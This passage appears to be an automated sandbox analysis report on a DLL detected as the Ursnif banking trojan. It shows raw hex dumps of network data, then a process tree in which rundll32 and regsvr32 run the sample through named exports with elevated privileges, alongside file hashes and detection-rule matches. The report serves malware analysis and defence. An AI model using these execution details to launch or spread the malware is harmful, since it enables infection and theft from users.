                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC83INData Raw: ab 16 b8 71 6d cd c7 ba d1 38 11 a6 9f f8 6f f0 cb 80 95 7b 80 af 17 79 31 06 d2 30 e4 0d fd cd 42 d5 85 cc 49 2c ec 72 59 d8 e5 98 f5 26 82 dc e1 ae da 1a a7 e2 4b cc 2d e8 fa 90 6a 1f 8d b0 c2 f0 51 03 5a 61 5f c6 0c 52 bb bb 39 76 20 90 ba 94 9d 20 1d b3 4a 55 a0 1b 26 4a e8 61 90 45 3b b2 13 76 dc b0 e4 b4 36 27 b8 cd 15 25 10 b6 20 a8 81 3e f9 a5 f8 c8 1e cd 9a 25 ff 00 96 24 9d e4 92 db 78 8a c3 31 20 01 d9 bf f0 28 48 5b 50 0f 9e f4 08 0d 22 6a 08 b0 f3 f4 98 a6 e7 d2 80 02 46 0c 64 7d 28 45 e6 25 e7 0a 46 c0 8f 34 20 92 a3 26 4c 91 24 d0 63 70 dd 66 07 32 b2 57 a6 66 8b 21 99 2f f1 3c 12 4e 07 d0 45 41 3a 58 1c 05 0a 24 9e 94 49 4b 84 00 49 9a d9 c3 18 fb 7d 3a 51 32 e4 0d ce 3d ab fc eb aa 80 0f ca 18 f3 1e b8 02 ad f1 1c 35 f5 7b 57 2d dc f8 19
                                                                                                                                                                                                                                  Data Ascii: qm8o{y10BI,rY&K-jQZa_R9v JU&JaE;v6'% >%$x1 (H[P"jFd}(E%F4 &L$cpf2Wf!/<NEA:X$IKI}:Q2=5{W-
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC85INData Raw: 74 42 01 89 6b 86 44 fd 68 80 b0 23 fd ca 26 4d 69 6c cf e8 47 bd 64 c3 26 27 7c 0f 7a 2d 1a ca 29 8e 40 58 9a ce c3 e6 70 2b 6f c4 40 9f c7 94 8c d1 31 76 ef 5e e5 a8 10 a2 40 f2 a4 09 02 9b 52 a0 96 9d c4 e4 56 2e db 5b 24 15 e5 90 25 7e e2 05 1c a3 c7 6d c4 d0 e5 b6 09 d8 40 26 2b 25 94 64 60 98 06 9b 52 f0 d2 d0 60 e6 b0 88 58 88 fc c4 cc e3 e7 40 43 2a 89 13 04 f8 f9 ef 4a 25 ae a0 27 d8 6f 46 6e 5d b0 b1 83 0a a1 68 b8 4f 54 c4 e0 02 60 4e 41 a6 16 f8 78 ef f1 e0 fd b6 ad 24 a8 19 9e a7 39 35 cc 2d 96 0d 81 9d c4 56 42 b1 14 40 3c 28 fb 92 45 75 d6 df 25 ad cf e1 bf f8 09 c7 4f 91 ae 75 6b 8a 31 12 45 c8 33 f5 a3 24 cc 88 e9 d8 d3 03 11 00 f7 1f a4 d1 57 c1 4f 0c 06 22 82 ca dd 47 03 f2 bf 2e 3a 6c 45 02 c2 c8 99 c6 44 1a 30 5b 94 9e f0 b5 20 d9 cc
                                                                                                                                                                                                                                  Data Ascii: tBkDh#&MilGd&'|z-)@Xp+o@1v^@RV.[$%~m@&+%d`R`X@C*J%'oFn]hOT`NAx$95-VB@<(Eu%Ouk1E3$WO"G.:lED0[
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC86INData Raw: 2a f3 8c 0c 4d a5 ff 00 cd 72 a8 7d 71 d2 28 c7 a2 bb 74 94 a8 12 82 07 c8 d0 04 f1 37 b5 27 81 00 0a 18 e1 d4 13 99 83 98 ad ce 20 6f 47 2e c1 58 ff 00 ba 4d 10 05 ab aa 1a 3a 7a 6c 64 52 c2 dc ba 0b 79 52 c2 68 c8 e3 df 87 e1 bb e8 01 66 3b b1 63 02 83 5f ba 4b df 60 37 73 d0 78 1b 0f c3 a4 d6 0e d2 7a 50 28 a0 a2 1f d4 d6 67 f1 e9 59 35 89 ae 95 36 56 0a f6 0d 9f d8 8a 60 f7 f8 8e 0a 5c e1 5d 9d 05 b0 9e da 68 8d 3c 23 a0 23 3a 9d 53 51 3e fa ea 55 6c b4 08 d8 69 02 7d e8 01 24 81 1d 18 44 66 66 89 e4 0b 9c e5 53 4d 4a 6b 51 3d 40 89 15 85 e3 5a 79 d7 66 61 e6 8e a6 b7 68 ea d4 a3 13 07 ad 11 a5 c0 c3 2e d0 0f 7f 35 81 76 49 0c bb 69 3e 69 b4 2f 03 72 e4 ea 5e e7 b9 a9 3f cd 5e 98 65 d9 bd fc d4 70 fc 07 0e bc 43 5b 2c 08 7e 2a fb 17 52 47 65 26 6a 10
                                                                                                                                                                                                                                  Data Ascii: *Mr}q(t7' oG.XM:zldRyRhf;c_K`7sxzP(gY56V`\]h<##:SQ>Uli}$DffSMJkQ=@Zyfah.5vIi>i/r^?^epC[,~*RGe&j


                                                                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                  Analysis Process: loaddll32.exe PID: 5004 Parent PID: 4040

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:31
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:loaddll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll'
                                                                                                                                                                                                                                  Imagebase:0xf80000
                                                                                                                                                                                                                                  File size:116736 bytes
                                                                                                                                                                                                                                  MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.518028253.0000000001420000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.504757746.00000000033E8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.505290500.00000000033E8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.505377175.00000000033E8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.504698368.00000000033E8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.504300183.00000000033E8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.504841805.00000000033E8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.504617318.00000000033E8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.504419460.00000000033E8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: cmd.exe PID: 2800 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:31
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
                                                                                                                                                                                                                                  Imagebase:0x870000
                                                                                                                                                                                                                                  File size:232960 bytes
                                                                                                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: regsvr32.exe PID: 5828 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:31
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:regsvr32.exe /s C:\Users\user\Desktop\qT9Qk5aKTk.dll
                                                                                                                                                                                                                                  Imagebase:0x110000
                                                                                                                                                                                                                                  File size:20992 bytes
                                                                                                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.474137548.0000000004CC8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.473987515.0000000004CC8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.473902712.0000000004CC8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.474356584.0000000004CC8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.523877392.00000000027C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.474088169.0000000004CC8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.528892428.0000000004CC8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.474318739.0000000004CC8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.474399932.0000000004CC8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.474430335.0000000004CC8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 1404 Parent PID: 2800

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:32
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.322676857.0000000005168000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.322202508.0000000005168000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.522287201.0000000002CF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.322499280.0000000005168000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.513121198.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.322381939.0000000005168000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.322406561.0000000005168000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.322337741.0000000005168000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.322575665.0000000005168000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.530985686.0000000005168000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.322291731.0000000005168000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: iexplore.exe PID: 2760 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:32
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  Imagebase:0x7ff6b63b0000
                                                                                                                                                                                                                                  File size:823560 bytes
                                                                                                                                                                                                                                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 2448 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:33
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Aquatically
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.294274391.0000000003610000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: iexplore.exe PID: 1112 Parent PID: 2760

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:33
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:17410 /prefetch:2
                                                                                                                                                                                                                                  Imagebase:0x12f0000
                                                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 5440 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:36
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Episodically
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000007.00000002.305530234.00000000047E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 6296 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:40
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Kakapo
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000009.00000002.310878760.00000000033B0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 6440 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:44
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Overdistantness
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000A.00000002.320841608.00000000007F0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 6540 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:48
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Pseudopodal
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000C.00000002.329480680.0000000002BA0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: iexplore.exe PID: 6664 Parent PID: 2760

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:49
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:82962 /prefetch:2
                                                                                                                                                                                                                                  Imagebase:0x12f0000
                                                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 6840 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:52
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Microphage
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000000.345060840.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000000.340961934.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000000.346648661.00000000032A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000002.433128810.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000002.438165350.00000000032A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000000.342868805.00000000032A0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 7160 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:55
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Cytost
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000002.347833864.0000000000920000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 2736 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:59
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Reattach
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.366167651.0000000000510000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000002.459018631.0000000000510000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.364022083.0000000003EF0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.371029885.0000000003EF0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.361319898.0000000000510000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 4844 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:02
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Vigia
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001B.00000002.372926133.00000000049A0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  Chronological Activities

